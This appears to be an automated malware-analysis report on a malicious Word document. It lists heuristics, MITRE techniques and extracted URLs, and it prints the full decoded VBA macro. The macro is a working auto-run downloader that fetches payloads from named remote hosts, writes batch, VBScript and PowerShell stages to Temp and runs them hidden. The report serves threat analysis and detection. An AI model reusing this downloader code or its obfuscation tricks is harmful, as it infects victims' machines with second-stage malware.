MALICIOUS
354
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
The sample is a malicious Word document containing VBA macros. The macros utilize CreateObject and Shell calls to download and execute a payload from remote URLs. Specifically, the script attempts to download files from 'http://searchengineservant.com/affiliates/fonts/67153178.txt123123123', 'http://savepic.su/5607313.png', and 'http://savepic.su/5605265.png', indicating an intent to fetch and run a second-stage exploit or malware.
Heuristics 13
-
ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
-
VBA macros detected medium 9 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
a = Shell(b, 0) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set objHTTP = CreateObject("M" & "SXML2.ServerXMLHTTP") -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Quick = GetObject(a) -
Payload URL assembled from a Chr()/Asc() string expression (3 URLs) high OLE_VBA_EXPR_DROPPER_URLA VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Environ(a) -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://scottspotson.com/wp-includes/certificates/67153178.txt In document text (OLE body)
- http://searchengineservant.com/affiliates/fonts/lns.txtIn document text (OLE body)
- http://scottspotson.com/wp-includes/certificates/lns.txtIn document text (OLE body)
- http://searchengineservant.com/affiliatSCOIn document text (OLE body)
- http://searchengineservant.com/affiliates/fonts/67153178.txt123123123Referenced by macro
- http://savepic.su/5607313.pngReferenced by macro
- http://savepic.su/5605265.pngReferenced by macro
- http://searchengineservant.com/affiliates/fonts/67153178.txtReferenced by macro
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8349 bytes |
SHA-256: b24750d30e581f074a2bc8c72fb025e6e2357c292ef8a8c214b105b454b44ec4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Uhuqbdhqbdqvdgv_Open()
End Sub
Sub Auto_Open()
uqgwyudyqbvhbvsgdhavsda
End Sub
Sub Uqhdbmanbsdhjqwvdbnqvdqnb()
End Sub
Sub uqgwyudyqbvhbvsgdhavsda()
Dim huwe, auwd As Integer
Dim retVal As Variant
Dim HPPSDJ As String
YUGQYD = Module1.Ubqhwdhwqbd(16735)
FL2 = YUGQYD
HPPSDJ = "Temp"
PH2 = Module1.Bad(HPPSDJ) + "\"
Dim asjiw As Integer, haus As Integer
haus = CInt(YUGQYD)
asjiw = 1 - haus
SSSS = 115 + Sgn(asjiw)
NDUWGD = "461237618273612"
HYWDAX = "baqhwduiqwhduqwbgdjhwqdbhjqvt"
JWIDJIAAA = Chr(SSSS - 16) + "a"
HUYFEA = JWIDJIAAA + Right(HYWDAX, 1)
WKDOQ = NDUWGD
PSFL = FL2 + "" & "." + "p" + "" + Chr(Asc("s")) _
+ _
"1"
SSS = Chr(SSSS + 1)
VBFL = FL2 + Chr(50 - 4) + "v" + "b" & "" & SSS & ""
huwe = 1
BAFL = FL2 + Chr(Sgn(Fix(-22.043)) + 11 + 10 + 25 + huwe + 0) + HUYFEA
INTG = "" & "o" & "bject"
AFTG = "m" & "odule"
SXEE = Chr(46)
SXAA = Chr(101)
SXE = SXEE & SXAA & "xe"
GNG = ".png"
PHT = "" & "ht" & "t" & "p://" & ""
SPIC = "" & "sav" & "epic.su/"
PSPTH = PH2 + PSFL
VBPTH = PH2 + VBFL
BAPTH = "kasjdklasjdkljas ldj asdsad"
ABPTH = PH2 + BAFL
BAPTH = ABPTH
Dim DRT As Integer, BFT As Integer, CFT As Integer, DFT As Integer, EFT As Integer
DRT = 310
BFT = 311
CFT = 312
DFT = 313
EFT = 314
Dim PBIn As String, asdwq As String, MIWDWQ As String
PBIn = "http://searchengineservant.com/affiliates/fonts/67153178.txt"
CONT = Module1.Price(PBIn)
asdwq = CONT
HQUWDAAA = "0"
If (asdwq = "") Then
PBIn = "http://scottspotson.com/wp-includes/certificates/67153178.txt"
CONT = Module1.Price(PBIn)
asdwq = CONT
HQUWDAAA = "1"
End If
CONT = Module1.Huwdbyqxv(asdwq)
TVT10 = Module1.Kort(CONT, "text10")
TVT20 = Module1.Kort(CONT, "text20")
TVT21 = Module1.Kort(CONT, "text21")
TVT30 = Module1.Kort(CONT, "text30")
TVT31 = Module1.Kort(CONT, "text31")
XPT1 = Module1.Kort(CONT, "stext1")
XPT2 = Module1.Kort(CONT, "stext2")
XPT3 = Module1.Kort(CONT, "stext3")
WVR = Module1.Bad("USE" & "RPROFILE")
UQHWDIHQW = "hjhkjh 1j2hghjg1jkh3g 1 g2j3g12kjh3g12hj "
hufehu1 = InStr(WVR, "sers\")
Dim hudhw As Integer
Dim ghdAdd(1 To 3)
ghdAdd(1) = "1"
ghdAdd(2) = "0"
ghdAdd(3) = "0"
If (hufehu1 <> 0) Then
ghdAdd(1) = "2"
Else
ghdAdd(2) = "3"
End If
JHWQUD = Join(ghdAdd)
hudhw = Val(JHWQUD)
Module1.WaitFor (1)
MIWDWQ = "http://searchengineservant.com/affiliates/fonts/lns.txt"
If (HQUWDAAA = "1") Then
MIWDWQ = "http://scottspotson.com/wp-includes/certificates/lns.txt"
End If
SEXX = Module1.Price(MIWDWQ)
PSTB = PBIn + "123123123"
MSTAR1 = SPIC + "5607313" + GNG
MSTAR2 = SPIC + "5605265" + GNG
STAR1 = PHT + MSTAR1
STAR2 = PHT + MSTAR2
FFQ = "8"
FF = FFQ + SXE
If (hudhw = 130) Then
Open BAPTH For Output As #DRT
Print #DRT, XPT1
Print #DRT, ":qjido"
Print #DRT, "set trfd=" + Chr(34) + PH2 + Chr(34)
Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
Print #DRT, XPT2
Close #DRT
Module1.WaitFor (1)
Open VBPTH For Output As #BFT
Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & ""
Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
Print #BFT, XPT3
Close #BFT
Module1.WaitFor (1)
NTH1 = Module1.Freat(retVal, BAPTH)
End If
If (hudhw = 200) Then
ZPQSKD = FL2
Open PSPTH For Output As #CFT
Print #CFT, "$ujdkwq = 'jqwdb';"
Print #CFT, "$stat = 'ht'+'tp://'+'" + MSTAR2 + "';"
Print #CFT, "$ggtt = '" + SEXX + "';"
Print #CFT, "$pths = '" + PH2 + "';"
Print #CFT, "$wehs = '" + ZPQSKD + "';"
Print #CFT, "$nnm = '" + FFQ + "';"
Print #CFT, TVT10
Close #CFT
Open VBPTH For Output As #DFT
Print #DFT, TVT30
Print #DFT, "c" + "urrentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&djwq"
Print #DFT, TVT31
Close #DFT
Open BAPTH For Output As #EFT
Print #EFT, "@echo off"
Print #EFT, TVT20
Print #EFT, "set Ads3=" + Chr(34) + FL2 + Chr(34)
Print #EFT, "set Mts4=" + Chr(34) + PH2 + Chr(34) + "%Ads3%"
Print #EFT, TVT21
Close #EFT
Module1.WaitFor (1)
NTH2 = Module1.Freat(retVal, BAPTH)
End If
JUW = Chr(47)
AKK = Chr(60)
ZKK = ">"
NTH3 = Module2.Nybdqwd(AKK + INTG + ZKK, AKK & JUW + INTG + ZKK, 1)
NTH4 = Module2.Nybdqwd(AKK + AFTG + ZKK, AKK + JUW + AFTG + ZKK, 2)
NTH5 = Module2.Nybdqwd(AKK + INTG + ZKK, "", 3)
NTH6 = Module2.Nybdqwd(AKK + JUW + INTG + ZKK, "", 3)
NTH7 = Module2.Nybdqwd(AKK + AFTG + ZKK, "", 3)
NTH8 = Module2.Nybdqwd(AKK + JUW + AFTG + ZKK, "", 3)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Attribute VB_Name = "Module1"
Sub WaitFor(NumOfSeconds As Long)
Dim SngSec As Long
SngSec = Timer + NumOfSeconds
Do While Timer < SngSec
DoEvents
Loop
End Sub
Public Function Price(a As String)
Dim objHTTP As Object
Dim PriceSheetURL As String
PriceSheetURL = a
Set objHTTP = CreateObject("M" & "SXML2.ServerXMLHTTP")
objHTTP.Open "GET", PriceSheetURL
objHTTP.Send ""
Price = objHTTP.ResponseText
End Function
Public Function Freat(a As Variant, b)
a = Shell(b, 0)
Freat = a
End Function
Public Function Ubqhwdhwqbd(a As Integer)
Ubqhwdhwqbd = CStr(Int((a * Rnd) + 10000))
End Function
Public Function Kort(a, b As String)
Dim krd, tent As Integer
UQWD = "<"
NDUW = "" & ">"
krd = InStr(1, a, UQWD + b + NDUW) + 8
tent = InStr(1, a, UQWD + "/" + b + NDUW) - krd
KLMN = Mid(a, krd, tent)
HUQHWDA = KLMN
Kort = HUQHWDA
End Function
Public Function Huwdbyqxv(ByVal strData As String) As String
Dim objXML As Object
Dim objNode As Object
Set objXML = CreateObject("" & "MSXML2.DOMDocument")
Set objNode = objXML.createElement("b64")
objNode.DataType = "bin.base64"
objNode.Text = strData
WUDHA = objNode.nodeTypedValue
Huwdbyqxv = WUDHA
Set objNode = Nothing
Set objXML = Nothing
MWDQ = ""
End Function
Public Function Dtgt(a As String)
Quick = GetObject(a)
End Function
Public Function Quick(a As String)
Quick = GetObject(a)
End Function
Public Function Bad(a As String)
Bad = _
Environ(a)
End Function
Attribute VB_Name = "Module2"
Public Function Nybdqwd(a As String, b As String, c As Integer)
Dim selectedText As String
Dim ytss, selRange As Range
Set ytss = ActiveDocument.Range
With ytss.Find
.Text = a
.MatchWholeWord = True
ytss.Find.Execute
ytss.Collapse direction:=wdCollapseEnd
QUWHGDYUQGWUYDQW = "uiyqwiydqw uqw eiqwyeui qeqywe iqwyei qwyeuiqwyeyiqw uey qwiuey21ie1"
Set selRange = ActiveDocument.Range
QHDIUWQHDQA = "i12h3 12jh3 kj12h3k1j2 3jk12h 3iu123 uk12hjhJKH JK2H"
selRange.Start = ytss.End
.Text = b
.MatchWholeWord = True
.Execute
ytss.Collapse direction:=wdCollapseStart
selRange.End = ytss.Start
If (c = 1) Then
selectedText = selRange.Delete
End If
If (c = 2) Then
selRange.Font.Color = wdColorBlack
End If
If (c = 3) Then
With ytss.Find
.Text = a
.Replacement.Text = Chr(1 + 1 + 28 + 2)
.Wrap = wdFindContinue
.Execute Replace:=wdReplaceAll
End With
End If
End With
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.